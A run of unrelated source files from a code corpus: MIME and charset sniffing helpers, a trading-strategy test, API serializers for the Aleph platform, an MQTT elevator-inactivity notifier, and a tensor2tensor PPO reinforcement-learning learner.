"""An extractor that tries to guess the content type based on the
name and data if the input contains no content type information.
"""
if name is None and data is None and content_type is None:
return None
mimeType = mimeTypeGetter(name=name, data=data, content_type=content_type)
if name and not mimeType:
mimeType, _encoding = mimetypes.guess_type(name, strict=True)
if not mimeType:
mimeType, _encoding = mimetypes.guess_type(name, strict=False)
#
# XXX If `encoding` is not None, we should re-consider the
# guess, since the encoding here is Content-Encoding, not
# charset. In particular, things like .tar.gz map to
# ('application/x-tar', 'gzip'), which may require different
# handling, or at least a separate content-type.
if data and not mimeType:
# no idea, really, but let's sniff a few common things:
for prefix, sniffed_type, _charset in _prefix_table:
if data.startswith(prefix):
mimeType = sniffed_type
break
return mimeType
interface.directlyProvides(mimeTypeGuesser, interfaces.IMimeTypeGetter)
def smartMimeTypeGuesser(name=None, data=None, content_type=None):
"""An extractor that checks the content for a variety of
constructs to try and refine the results of the
`mimeTypeGuesser()`. This is able to do things like check for
XHTML that's labelled as HTML in upload data.
"""
mimeType = mimeTypeGuesser(name=name, data=data, content_type=content_type)
if data and mimeType == "text/html":
for prefix, _mimetype, _charset in _xml_prefix_table:
if data.startswith(prefix):
# don't use text/xml from the table, but take
# advantage of the text/html hint (from the upload
# or mimetypes.guess_type())
mimeType = "application/xhtml+xml"
break
return mimeType
interface.directlyProvides(smartMimeTypeGuesser, interfaces.IMimeTypeGetter)
# Very simple magic numbers table for a few things we want to be good
# at identifying even if we get no help from the input:
#
_xml_prefix_table = (
# prefix, mimeType, charset
(b"<?xml", "text/xml", None),
(b"\xef\xbb\xbf<?xml", "text/xml", "utf-8"), # w/ BOM
(b"\0<\0?\0x\0m\0l", "text/xml", "utf-16be"),
(b"<\0?\0x\0m\0l\0", "text/xml", "utf-16le"),
(b"\xfe\xff\0<\0?\0x\0m\0l", "text/xml", "utf-16be"), # w/ BOM
(b"\xff\xfe<\0?\0x\0m\0l\0", "text/xml", "utf-16le"), # w/ BOM
)
_prefix_table = _xml_prefix_table + (
(b"<html", "text/html", None),
(b"<HTML", "text/html", None),
(b"GIF89a", "image/gif", None),
# PNG Signature: bytes 137 80 78 71 13 10 26 10
(b"\x89PNG\r\n\x1a\n", "image/png", None),
)
def charsetGetter(name=None, data=None, content_type=None):
"""Default implementation of `zope.mimetype.interfaces.ICharsetGetter`."""
if name is None and data is None and content_type is None:
return None
if content_type:
try:
major, minor, params = zope.contenttype.parse.parse(content_type)
except ValueError:
pass
else:
if params.get("charset"):
return params["charset"].lower()
if data:
if data.startswith(codecs.BOM_UTF16_LE):
return 'utf-16le'
elif data.startswith(codecs.BOM_UTF16_BE):
return 'utf-16be'
try:
data.decode('ascii')
return 'ascii'
except UnicodeDecodeError:
try:
data.decode('utf-8')
return 'utf-8'
except UnicodeDecodeError:
pass
return None
interface.directlyProvides(charsetGetter, interfaces.ICharsetGetter)
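# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the original
# module). It runs the three extractors over the same XHTML payload to show
# the cascade of increasing effort; the file name and sample bytes are made
# up for this example.
def _example_guess():
    data = b"<?xml version='1.0'?><html xmlns='http://www.w3.org/1999/xhtml'/>"
    # the minimal getter refuses to guess without an explicit content type
    assert mimeTypeGetter(name="page.html", data=data) is None
    # the guesser falls back to the file extension: text/html
    assert mimeTypeGuesser(name="page.html", data=data) == "text/html"
    # the smart guesser notices the XML prefix and upgrades the guess
    assert smartMimeTypeGuesser(name="page.html", data=data) == "application/xhtml+xml"
    # charsetGetter sniffs plain ASCII when no charset parameter is present
    assert charsetGetter(data=data) == "ascii"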
|
the-stack_106_14819
|
from jesse.strategies import Strategy
import jesse.helpers as jh
class TestAverageEntryPriceProperty(Strategy):
def should_long(self):
return self.price in [1, 5, 10]
def update_position(self) -> None:
if self.price in [3, 7]:
self.liquidate()
def go_long(self):
if self.price == 1:
self.buy = [
(1, 2),
(1, 3),
]
if self.price == 5:
self.buy = [
(1, 5),
(1, 7),
]
if self.price == 10:
self.buy = [
(1, 12),
(1, 13),
]
def before(self) -> None:
# when both orders have been filled
if self.price == 3:
assert self.average_entry_price == 2.5
# when only one order has been filled
if self.price == 6:
assert self.average_entry_price == 6
# when no orders have been filled
if self.price == 11:
assert self.average_entry_price == 12.5
def should_cancel(self):
return False
def should_short(self):
return False
def go_short(self):
pass
|
the-stack_106_14822
|
import logging
# from pprint import pprint
from flask import request
from normality import stringify
from pantomime.types import PDF, CSV
from banal import ensure_list, is_listish, is_mapping, first
from followthemoney import model
from followthemoney.types import registry
from followthemoney.helpers import entity_filename
from aleph.core import url_for
from aleph.model import Role, Collection, Document, Entity, Events, Alert
from aleph.logic import resolver
from aleph.logic.util import collection_url, entity_url, archive_url
from aleph.views.util import jsonify
log = logging.getLogger(__name__)
class Serializer(object):
def __init__(self, reference=False):
self.reference = reference
def _collect(self, obj):
pass
def _serialize(self, obj):
return obj
def queue(self, clazz, key, schema=None):
if not self.reference:
resolver.queue(request, clazz, key, schema=schema)
def resolve(self, clazz, key, serializer=None):
if self.reference:
return
data = resolver.get(request, clazz, key)
if data is not None and serializer is not None:
serializer = serializer(reference=True)
data = serializer.serialize(data)
return data
def serialize(self, obj):
obj = self._to_dict(obj)
if obj is not None:
self._collect(obj)
resolver.resolve(request)
return self._serialize(obj)
def serialize_many(self, objs):
collected = []
for obj in ensure_list(objs):
obj = self._to_dict(obj)
if obj is not None:
self._collect(obj)
collected.append(obj)
resolver.resolve(request)
serialized = []
for obj in collected:
obj = self._serialize(obj)
if obj is not None:
serialized.append(obj)
return serialized
def _to_dict(self, obj):
if hasattr(obj, 'to_dict'):
obj = obj.to_dict()
if hasattr(obj, '_asdict'):
obj = obj._asdict()
return obj
def _clean_response(self, data):
"""Remove unset values from the response to save some bandwidth."""
if is_mapping(data):
out = {}
for k, v in data.items():
v = self._clean_response(v)
if v is not None:
out[k] = v
return out if len(out) else None
elif is_listish(data):
data = [self._clean_response(d) for d in data]
data = [d for d in data if d is not None]
return data if len(data) else None
elif isinstance(data, str):
return data if len(data) else None
return data
@classmethod
def jsonify(cls, obj, **kwargs):
data = cls().serialize(obj)
return jsonify(data, **kwargs)
@classmethod
def jsonify_result(cls, result, extra=None, **kwargs):
data = result.to_dict(serializer=cls)
if extra is not None:
data.update(extra)
return jsonify(data, **kwargs)
class RoleSerializer(Serializer):
def _serialize(self, obj):
obj['id'] = str(obj.get('id'))
obj['links'] = {
'self': url_for('roles_api.view', id=obj.get('id'))
}
obj['writeable'] = request.authz.can_write_role(obj.get('id'))
if not obj['writeable']:
obj.pop('has_password', None)
obj.pop('is_muted', None)
obj.pop('is_tester', None)
obj.pop('is_blocked', None)
obj.pop('api_key', None)
obj.pop('email', None)
obj.pop('created_at', None)
obj.pop('updated_at', None)
if obj['type'] != Role.USER:
obj.pop('api_key', None)
obj.pop('email', None)
obj.pop('locale', None)
obj.pop('password', None)
return self._clean_response(obj)
class AlertSerializer(Serializer):
# def _collect(self, obj):
# self.queue(Role, obj.get('role_id'))
def _serialize(self, obj):
pk = obj.get('id')
obj['id'] = str(pk)
obj['links'] = {
'self': url_for('alerts_api.view', alert_id=pk)
}
role_id = obj.pop('role_id', None)
obj['writeable'] = role_id == stringify(request.authz.id)
# obj['role'] = self.resolve(Role, role_id, RoleSerializer)
return obj
class CollectionSerializer(Serializer):
def _collect(self, obj):
self.queue(Role, obj.get('creator_id'))
for role_id in ensure_list(obj.get('team_id')):
self.queue(Role, role_id)
def _serialize(self, obj):
pk = obj.get('id')
obj['id'] = str(pk)
obj['links'] = {
'self': url_for('collections_api.view', collection_id=pk),
'xref': url_for('xref_api.index', collection_id=pk),
'xref_export': url_for('xref_api.export', collection_id=pk,
_authorize=obj.get('secret')),
'reconcile': url_for('reconcile_api.reconcile',
collection_id=pk,
_authorize=obj.get('secret')),
'ui': collection_url(pk)
}
obj['writeable'] = request.authz.can(pk, request.authz.WRITE)
creator_id = obj.pop('creator_id', None)
obj['creator'] = self.resolve(Role, creator_id, RoleSerializer)
team_id = ensure_list(obj.pop('team_id', []))
if obj['writeable']:
obj['team'] = []
for role_id in team_id:
role = self.resolve(Role, role_id, RoleSerializer)
if role is not None:
obj['team'].append(role)
obj.pop('_index', None)
return self._clean_response(obj)
class PermissionSerializer(Serializer):
def _collect(self, obj):
self.queue(Role, obj.get('role_id'))
def _serialize(self, obj):
obj.pop('collection_id', None)
role_id = obj.pop('role_id', None)
obj['role'] = self.resolve(Role, role_id, RoleSerializer)
return obj
class EntitySerializer(Serializer):
def _collect(self, obj):
self.queue(Collection, obj.get('collection_id'))
self.queue(Role, obj.get('uploader_id'))
schema = model.get(obj.get('schema'))
if schema is None:
return
properties = obj.get('properties', {})
for prop in schema.properties.values():
if prop.type != registry.entity:
continue
values = ensure_list(properties.get(prop.name))
for value in values:
self.queue(Entity, value, prop.range)
def _serialize(self, obj):
pk = obj.get('id')
obj['id'] = str(pk)
authz = request.authz
collection_id = obj.pop('collection_id', None)
obj['collection'] = self.resolve(Collection, collection_id,
CollectionSerializer)
proxy = model.get_proxy(obj)
obj['schemata'] = proxy.schema.names
properties = obj.get('properties', {})
for prop in proxy.iterprops():
if prop.type != registry.entity:
continue
values = ensure_list(properties.get(prop.name))
properties[prop.name] = []
for value in values:
entity = self.resolve(Entity, value, EntitySerializer)
properties[prop.name].append(entity)
links = {
'self': url_for('entities_api.view', entity_id=pk),
'references': url_for('entities_api.references', entity_id=pk),
'tags': url_for('entities_api.tags', entity_id=pk),
'ui': entity_url(pk)
}
if proxy.schema.is_a(Document.SCHEMA):
links['content'] = url_for('entities_api.content', entity_id=pk)
content_hash = first(properties.get('contentHash'))
if content_hash:
name = entity_filename(proxy)
mime_type = first(properties.get('mimeType'))
links['file'] = archive_url(request.authz.id, content_hash,
file_name=name,
mime_type=mime_type)
pdf_hash = first(properties.get('pdfHash'))
if pdf_hash:
name = entity_filename(proxy, extension='pdf')
links['pdf'] = archive_url(request.authz.id, pdf_hash,
file_name=name, mime_type=PDF)
csv_hash = first(properties.get('csvHash'))
if csv_hash:
name = entity_filename(proxy, extension='csv')
links['csv'] = archive_url(request.authz.id, csv_hash,
file_name=name, mime_type=CSV)
obj['links'] = links
obj['writeable'] = authz.can(collection_id, authz.WRITE)
obj.pop('_index', None)
return self._clean_response(obj)
class MatchCollectionsSerializer(Serializer):
def _serialize(self, obj):
serializer = CollectionSerializer(reference=True)
obj['collection'] = serializer.serialize(obj.get('collection'))
return obj
class MatchSerializer(Serializer):
def _collect(self, obj):
matchable = tuple([s.matchable for s in model])
self.queue(Entity, obj.get('entity_id'), matchable)
self.queue(Entity, obj.get('match_id'), matchable)
def _serialize(self, obj):
obj['id'] = str(obj['id'])
entity_id = obj.pop('entity_id', None)
obj['entity'] = self.resolve(Entity, entity_id, EntitySerializer)
match_id = obj.pop('match_id', None)
obj['match'] = self.resolve(Entity, match_id, EntitySerializer)
if obj['entity'] and obj['match']:
return obj
class QueryLogSerializer(Serializer):
pass
class NotificationSerializer(Serializer):
SERIALIZERS = {
Alert: AlertSerializer,
Entity: EntitySerializer,
Collection: CollectionSerializer,
Role: RoleSerializer
}
def _collect(self, obj):
self.queue(Role, obj.get('actor_id'))
event = Events.get(obj.get('event'))
for name, clazz in event.params.items():
key = obj.get('params', {}).get(name)
self.queue(clazz, key, Entity.THING)
def _serialize(self, obj):
obj['id'] = str(obj['id'])
event = Events.get(obj.get('event'))
params = {
'actor': self.resolve(Role, obj.get('actor_id'), RoleSerializer)
}
for name, clazz in event.params.items():
key = obj.get('params', {}).get(name)
serializer = self.SERIALIZERS.get(clazz)
params[name] = self.resolve(clazz, key, serializer)
obj['params'] = params
obj['event'] = event.to_dict()
return obj
class MappingSerializer(Serializer):
pass
class DiagramEntitySerializer(EntitySerializer):
def _serialize(self, obj):
pk = obj.get('id')
obj['id'] = str(pk)
schema = model.get(obj.get('schema'))
if schema is None:
return None
properties = obj.get('properties', {})
for prop in schema.properties.values():
if prop.type != registry.entity:
continue
values = ensure_list(properties.get(prop.name))
if values:
properties[prop.name] = []
for value in values:
entity = self.resolve(Entity, value, DiagramEntitySerializer) # noqa
if entity is None:
entity = value
properties[prop.name].append(entity)
obj.pop('_index', None)
collection_id = obj.pop('collection_id', None)
obj['collection_id'] = str(collection_id)
return self._clean_response(obj)
class DiagramSerializer(Serializer):
def _collect(self, obj):
self.queue(Collection, obj.get('collection_id'))
ent_ids = obj['entities']
for ent_id in ensure_list(ent_ids):
self.queue(Entity, ent_id)
def _serialize(self, obj):
pk = obj.get('id')
obj['id'] = str(pk)
collection_id = obj.pop('collection_id', None)
obj['writeable'] = request.authz.can(collection_id, request.authz.WRITE) # noqa
obj['collection'] = self.resolve(Collection, collection_id, CollectionSerializer) # noqa
ent_ids = obj.pop('entities')
obj['entities'] = []
for ent_id in ent_ids:
entity = self.resolve(Entity, ent_id, DiagramEntitySerializer)
if entity is not None:
obj['entities'].append(entity)
for ent in obj['entities']:
schema = model.get(ent.get('schema'))
properties = ent.get('properties', {})
for prop in schema.properties.values():
if prop.type != registry.entity:
continue
values = ensure_list(properties.get(prop.name))
if values:
properties[prop.name] = []
for value in values:
entity = self.resolve(Entity, value, DiagramEntitySerializer) # noqa
properties[prop.name].append(entity)
return self._clean_response(obj)
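# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the original
# module). Inside a Flask view, serializers are normally used through their
# jsonify()/jsonify_result() class methods; the route and lookup helper below
# are hypothetical:
#
#   @blueprint.route('/api/2/roles/<int:id>')
#   def view(id):
#       role = lookup_role(id)              # hypothetical lookup helper
#       return RoleSerializer.jsonify(role)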
|
the-stack_106_14825
|
#!/usr/bin/env python
import paho.mqtt.client as mqtt
import numpy as np
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
client.subscribe("test/#")
def on_message(client, userdata, msg):
global count
count = float(msg.payload)
check_payload()
def generate_condition(arr):
"""
    The function generates an if/elif condition chain based on the frequency of notifications.
    The if condition always begins with the largest inactivity, so the last elif is the condition,
    using the smallest inactivity, that the user needs to be aware of. The position of each element,
    together with the array length, is used to assign a value for the flag. The smallest inactivity,
    i.e. the last elif, must assign False to the boolean variable; this variable is inverted as we
    move towards the top of the if statement.
"""
code = """"""
for i, j in enumerate(arr):
if i == 0:
text = 'if count > ' + str(j) + ':\n'
if len(arr) % 2 == 0:
text += ' flip('+str((i+1) % 2 != 0)+')\n'
else:
text += ' flip('+str((i+1) % 2 == 0)+')\n'
else:
text = 'elif count > ' + str(j) + ':\n'
if len(arr) % 2 == 0:
text += ' flip('+str((i+1) % 2 != 0)+')\n'
else:
text += ' flip('+str((i+1) % 2 == 0)+')\n'
code += text
return code
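# Hedged example (added for illustration; not part of the original script):
# for a hypothetical descending threshold list [2, 1, 0.5] (hours),
# generate_condition([2, 1, 0.5]) returns roughly:
#
#   if count > 2:
#       flip(False)
#   elif count > 1:
#       flip(True)
#   elif count > 0.5:
#       flip(False)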
def exec_payload():
"""
Function that operates on the reported inactivity payload.
Can be used for printing, telegram alerting, etc.
"""
global count
unit = 'minutes' if count < 1 else 'hours'
value = count*60 if count < 1 else count
    print('The elevator has been inactive for the last %s %s' % (value, unit))
def flip(var):
"""
Once the if else condition is satisfied, the current flag is inverted.
    This is to ensure that we only get a single notification each time a condition is passed.
"""
global flag
if flag == var:
exec_payload()
flag = not var
def check_payload():
"""
Executes the code generated from generate_condition().
    The if/else constraints (thresholds) are passed as parameters.
"""
arr = [44/60, 0.99, 1.99, 2.99, 3.99, 7.99, 9.99]
code = generate_condition(arr[::-1]) # we pass the array in descending order, eg: [24 hrs, 12hrs, 6hrs, 3hrs]
exec(code)
if 'flag' not in globals():
flag = False
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect("localhost", 1883, 60)
client.loop_forever()
|
the-stack_106_14826
|
# coding=utf-8
# Copyright 2019 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PPO learner."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os
from tensor2tensor.layers import common_layers
from tensor2tensor.models.research.rl import get_policy
from tensor2tensor.rl import ppo
from tensor2tensor.rl.envs.tf_atari_wrappers import StackWrapper
from tensor2tensor.rl.envs.tf_atari_wrappers import WrapperBase
from tensor2tensor.rl.policy_learner import PolicyLearner
from tensor2tensor.rl.restarter import Restarter
from tensor2tensor.utils import trainer_lib
import tensorflow.compat.v1 as tf
import tensorflow_probability as tfp
class PPOLearner(PolicyLearner):
"""PPO for policy learning."""
def __init__(self, frame_stack_size, base_event_dir, agent_model_dir,
total_num_epochs, **kwargs):
super(PPOLearner, self).__init__(
frame_stack_size, base_event_dir, agent_model_dir, total_num_epochs)
self._num_completed_iterations = 0
self._lr_decay_start = None
self._distributional_size = kwargs.get("distributional_size", 1)
self._distributional_subscale = kwargs.get("distributional_subscale", 0.04)
self._distributional_threshold = kwargs.get("distributional_threshold", 0.0)
def train(self,
env_fn,
hparams,
simulated,
save_continuously,
epoch,
sampling_temp=1.0,
num_env_steps=None,
env_step_multiplier=1,
eval_env_fn=None,
report_fn=None,
model_save_fn=None):
assert sampling_temp == 1.0 or hparams.learning_rate == 0.0, \
"Sampling with non-1 temperature does not make sense during training."
if not save_continuously:
# We do not save model, as that resets frames that we need at restarts.
# But we need to save at the last step, so we set it very high.
hparams.save_models_every_epochs = 1000000
if simulated:
simulated_str = "sim"
else:
simulated_str = "real"
name_scope = "ppo_{}{}".format(simulated_str, epoch + 1)
event_dir = os.path.join(self.base_event_dir, "ppo_summaries",
str(epoch) + simulated_str)
with tf.Graph().as_default():
with tf.name_scope(name_scope):
with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
env = env_fn(in_graph=True)
(train_summary_op, eval_summary_op, initializers) = (
_define_train(
env,
hparams,
eval_env_fn,
sampling_temp,
distributional_size=self._distributional_size,
distributional_subscale=self._distributional_subscale,
distributional_threshold=self._distributional_threshold,
epoch=epoch if simulated else -1,
frame_stack_size=self.frame_stack_size,
force_beginning_resets=simulated))
if num_env_steps is None:
iteration_increment = hparams.epochs_num
else:
iteration_increment = int(
math.ceil(
num_env_steps / (env.batch_size * hparams.epoch_length)))
iteration_increment *= env_step_multiplier
self._num_completed_iterations += iteration_increment
restarter = Restarter(
"policy", self.agent_model_dir, self._num_completed_iterations
)
if restarter.should_skip:
return
if hparams.lr_decay_in_final_epoch:
if epoch != self.total_num_epochs - 1:
# Extend the warmup period to the end of this epoch.
hparams.learning_rate_warmup_steps = restarter.target_global_step
else:
if self._lr_decay_start is None:
# Stop the warmup at the beginning of this epoch.
self._lr_decay_start = \
restarter.target_global_step - iteration_increment
hparams.learning_rate_warmup_steps = self._lr_decay_start
_run_train(
hparams,
event_dir,
self.agent_model_dir,
restarter,
train_summary_op,
eval_summary_op,
initializers,
epoch,
report_fn=report_fn,
model_save_fn=model_save_fn)
def evaluate(self, env_fn, hparams, sampling_temp):
with tf.Graph().as_default():
with tf.name_scope("rl_eval"):
eval_env = env_fn(in_graph=True)
(collect_memory, _, collect_init) = _define_collect(
eval_env,
hparams,
"ppo_eval",
eval_phase=True,
frame_stack_size=self.frame_stack_size,
force_beginning_resets=False,
sampling_temp=sampling_temp,
distributional_size=self._distributional_size,
)
model_saver = tf.train.Saver(
tf.global_variables(hparams.policy_network + "/.*")
# tf.global_variables("clean_scope.*") # Needed for sharing params.
)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
collect_init(sess)
trainer_lib.restore_checkpoint(self.agent_model_dir, model_saver,
sess)
sess.run(collect_memory)
def _define_train(
train_env,
ppo_hparams,
eval_env_fn=None,
sampling_temp=1.0,
distributional_size=1,
distributional_subscale=0.04,
distributional_threshold=0.0,
epoch=-1,
**collect_kwargs
):
"""Define the training setup."""
memory, collect_summary, train_initialization = (
_define_collect(
train_env,
ppo_hparams,
"ppo_train",
eval_phase=False,
sampling_temp=sampling_temp,
distributional_size=distributional_size,
**collect_kwargs))
ppo_summary = ppo.define_ppo_epoch(
memory, ppo_hparams, train_env.action_space, train_env.batch_size,
distributional_size=distributional_size,
distributional_subscale=distributional_subscale,
distributional_threshold=distributional_threshold,
epoch=epoch)
train_summary = tf.summary.merge([collect_summary, ppo_summary])
if ppo_hparams.eval_every_epochs:
# TODO(koz4k): Do we need this at all?
assert eval_env_fn is not None
eval_env = eval_env_fn(in_graph=True)
(_, eval_collect_summary, eval_initialization) = (
_define_collect(
eval_env,
ppo_hparams,
"ppo_eval",
eval_phase=True,
sampling_temp=0.0,
distributional_size=distributional_size,
**collect_kwargs))
return (train_summary, eval_collect_summary, (train_initialization,
eval_initialization))
else:
return (train_summary, None, (train_initialization,))
def _run_train(ppo_hparams,
event_dir,
model_dir,
restarter,
train_summary_op,
eval_summary_op,
initializers,
epoch,
report_fn=None,
model_save_fn=None):
"""Train."""
summary_writer = tf.summary.FileWriter(
event_dir, graph=tf.get_default_graph(), flush_secs=60)
model_saver = tf.train.Saver(
tf.global_variables(ppo_hparams.policy_network + "/.*") +
tf.global_variables("training/" + ppo_hparams.policy_network + "/.*") +
# tf.global_variables("clean_scope.*") + # Needed for sharing params.
tf.global_variables("global_step") +
tf.global_variables("losses_avg.*") +
tf.global_variables("train_stats.*")
)
global_step = tf.train.get_or_create_global_step()
with tf.control_dependencies([tf.assign_add(global_step, 1)]):
train_summary_op = tf.identity(train_summary_op)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for initializer in initializers:
initializer(sess)
trainer_lib.restore_checkpoint(model_dir, model_saver, sess)
num_target_iterations = restarter.target_local_step
num_completed_iterations = num_target_iterations - restarter.steps_to_go
with restarter.training_loop():
for epoch_index in range(num_completed_iterations, num_target_iterations):
summary = sess.run(train_summary_op)
if summary_writer:
summary_writer.add_summary(summary, epoch_index)
if (ppo_hparams.eval_every_epochs and
epoch_index % ppo_hparams.eval_every_epochs == 0):
eval_summary = sess.run(eval_summary_op)
if summary_writer:
summary_writer.add_summary(eval_summary, epoch_index)
if report_fn:
summary_proto = tf.Summary()
summary_proto.ParseFromString(eval_summary)
for elem in summary_proto.value:
if "mean_score" in elem.tag:
report_fn(elem.simple_value, epoch_index)
break
if (model_saver and ppo_hparams.save_models_every_epochs and
(epoch_index % ppo_hparams.save_models_every_epochs == 0 or
(epoch_index + 1) == num_target_iterations)):
ckpt_name = "model.ckpt-{}".format(
tf.train.global_step(sess, global_step)
)
# Keep the last checkpoint from each epoch in a separate directory.
epoch_dir = os.path.join(model_dir, "epoch_{}".format(epoch))
tf.gfile.MakeDirs(epoch_dir)
for ckpt_dir in (model_dir, epoch_dir):
model_saver.save(sess, os.path.join(ckpt_dir, ckpt_name))
if model_save_fn:
model_save_fn(model_dir)
def _rollout_metadata(batch_env, distributional_size=1):
"""Metadata for rollouts."""
batch_env_shape = batch_env.observ.get_shape().as_list()
batch_size = [batch_env_shape[0]]
value_size = batch_size
if distributional_size > 1:
value_size = batch_size + [distributional_size]
shapes_types_names = [
# TODO(piotrmilos): possibly retrieve the observation type for batch_env
(batch_size + batch_env_shape[1:], batch_env.observ_dtype, "observation"),
(batch_size, tf.float32, "reward"),
(batch_size, tf.bool, "done"),
(batch_size + list(batch_env.action_shape), batch_env.action_dtype,
"action"),
(batch_size, tf.float32, "pdf"),
(value_size, tf.float32, "value_function"),
]
return shapes_types_names
class _MemoryWrapper(WrapperBase):
"""Memory wrapper."""
def __init__(self, batch_env):
super(_MemoryWrapper, self).__init__(batch_env)
infinity = 10000000
meta_data = list(zip(*_rollout_metadata(batch_env)))
    # In the memory wrapper we collect neither pdfs nor value_function,
    # thus we only need the first 4 entries of meta_data
shapes = meta_data[0][:4]
dtypes = meta_data[1][:4]
self.speculum = tf.FIFOQueue(infinity, shapes=shapes, dtypes=dtypes)
observs_shape = batch_env.observ.shape
# TODO(piotrmilos): possibly retrieve the observation type for batch_env
self._observ = tf.Variable(
tf.zeros(observs_shape, self.observ_dtype), trainable=False)
def __str__(self):
return "MemoryWrapper(%s)" % str(self._batch_env)
def simulate(self, action):
    # There is a subtlety here. We need to collect data as
    # obs, action = policy(obs); done, reward = env(obs, action).
    # Thus we need to enqueue the data before assigning the new observation.
reward, done = self._batch_env.simulate(action)
with tf.control_dependencies([reward, done]):
enqueue_op = self.speculum.enqueue(
[self._observ.read_value(), reward, done, action])
with tf.control_dependencies([enqueue_op]):
assign = self._observ.assign(self._batch_env.observ)
with tf.control_dependencies([assign]):
return tf.identity(reward), tf.identity(done)
def _define_collect(batch_env, ppo_hparams, scope, frame_stack_size, eval_phase,
sampling_temp, force_beginning_resets,
distributional_size=1):
"""Collect trajectories.
Args:
batch_env: Batch environment.
ppo_hparams: PPO hparams, defined in tensor2tensor.models.research.rl.
scope: var scope.
frame_stack_size: Number of last observations to feed into the policy.
eval_phase: TODO(koz4k): Write docstring.
sampling_temp: Sampling temperature for the policy.
force_beginning_resets: Whether to reset at the beginning of each episode.
distributional_size: optional, number of buckets in distributional RL.
Returns:
Returns memory (observations, rewards, dones, actions,
pdfs, values_functions)
containing a rollout of environment from nested wrapped structure.
"""
epoch_length = ppo_hparams.epoch_length
to_initialize = []
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
num_agents = batch_env.batch_size
to_initialize.append(batch_env)
wrappers = [(StackWrapper, {
"history": frame_stack_size
}), (_MemoryWrapper, {})]
rollout_metadata = None
speculum = None
for w in wrappers:
tf.logging.info("Applying wrapper %s(%s) to env %s." % (str(
w[0]), str(w[1]), str(batch_env)))
batch_env = w[0](batch_env, **w[1])
to_initialize.append(batch_env)
rollout_metadata = _rollout_metadata(batch_env, distributional_size)
speculum = batch_env.speculum
def initialization_lambda(sess):
for batch_env in to_initialize:
batch_env.initialize(sess)
memory = [
tf.get_variable( # pylint: disable=g-complex-comprehension
"collect_memory_%d_%s" % (epoch_length, name),
shape=[epoch_length] + shape,
dtype=dtype,
initializer=tf.zeros_initializer(),
trainable=False) for (shape, dtype, name) in rollout_metadata
]
cumulative_rewards = tf.get_variable(
"cumulative_rewards", len(batch_env), trainable=False)
eval_phase_t = tf.convert_to_tensor(eval_phase)
should_reset_var = tf.Variable(True, trainable=False)
zeros_tensor = tf.zeros(len(batch_env))
force_beginning_resets = tf.convert_to_tensor(force_beginning_resets)
def reset_ops_group():
return tf.group(
batch_env.reset(tf.range(len(batch_env))),
tf.assign(cumulative_rewards, zeros_tensor))
reset_op = tf.cond(
tf.logical_or(should_reset_var.read_value(), force_beginning_resets),
reset_ops_group, tf.no_op)
with tf.control_dependencies([reset_op]):
reset_once_op = tf.assign(should_reset_var, False)
with tf.control_dependencies([reset_once_op]):
def step(index, scores_sum, scores_num):
"""Single step."""
index %= epoch_length # Only needed in eval runs.
# Note - the only way to ensure making a copy of tensor is to run simple
# operation. We are waiting for tf.copy:
# https://github.com/tensorflow/tensorflow/issues/11186
obs_copy = batch_env.observ + 0
value_fun_shape = (num_agents,)
if distributional_size > 1:
value_fun_shape = (num_agents, distributional_size)
def env_step(arg1, arg2, arg3): # pylint: disable=unused-argument
"""Step of the environment."""
(logits, value_function) = get_policy(
obs_copy, ppo_hparams, batch_env.action_space, distributional_size
)
action = common_layers.sample_with_temperature(logits, sampling_temp)
action = tf.cast(action, tf.int32)
action = tf.reshape(action, shape=(num_agents,))
reward, done = batch_env.simulate(action)
pdf = tfp.distributions.Categorical(logits=logits).prob(action)
pdf = tf.reshape(pdf, shape=(num_agents,))
value_function = tf.reshape(value_function, shape=value_fun_shape)
done = tf.reshape(done, shape=(num_agents,))
with tf.control_dependencies([reward, done]):
return tf.identity(pdf), tf.identity(value_function), \
tf.identity(done)
# TODO(piotrmilos): while_body is executed at most once,
# thus should be replaced with tf.cond
pdf, value_function, top_level_done = tf.while_loop(
lambda _1, _2, _3: tf.equal(speculum.size(), 0),
env_step,
[
tf.constant(0.0, shape=(num_agents,)),
tf.constant(0.0, shape=value_fun_shape),
tf.constant(False, shape=(num_agents,))
],
parallel_iterations=1,
back_prop=False,
)
with tf.control_dependencies([pdf, value_function]):
obs, reward, done, action = speculum.dequeue()
to_save = [obs, reward, done, action, pdf, value_function]
save_ops = [
tf.scatter_update(memory_slot, index, value)
for memory_slot, value in zip(memory, to_save)
]
cumulate_rewards_op = cumulative_rewards.assign_add(reward)
agent_indices_to_reset = tf.where(top_level_done)[:, 0]
with tf.control_dependencies([cumulate_rewards_op]):
# TODO(piotrmilos): possibly we need cumulative_rewards.read_value()
scores_sum_delta = tf.reduce_sum(
tf.gather(cumulative_rewards.read_value(), agent_indices_to_reset))
scores_num_delta = tf.count_nonzero(done, dtype=tf.int32)
with tf.control_dependencies(save_ops +
[scores_sum_delta, scores_num_delta]):
reset_env_op = batch_env.reset(agent_indices_to_reset)
reset_cumulative_rewards_op = tf.scatter_update(
cumulative_rewards, agent_indices_to_reset,
tf.gather(zeros_tensor, agent_indices_to_reset))
with tf.control_dependencies([reset_env_op, reset_cumulative_rewards_op]):
return [
index + 1, scores_sum + scores_sum_delta,
scores_num + scores_num_delta
]
def stop_condition(i, _, resets):
return tf.cond(eval_phase_t, lambda: resets < num_agents,
lambda: i < epoch_length)
init = [tf.constant(0), tf.constant(0.0), tf.constant(0)]
index, scores_sum, scores_num = tf.while_loop(
stop_condition, step, init, parallel_iterations=1, back_prop=False)
  # We handle force_beginning_resets differently. We assume that all envs are
  # reset at the end of an episode (though it actually happens at the beginning
  # of the next one).
scores_num = tf.cond(force_beginning_resets,
lambda: scores_num + len(batch_env), lambda: scores_num)
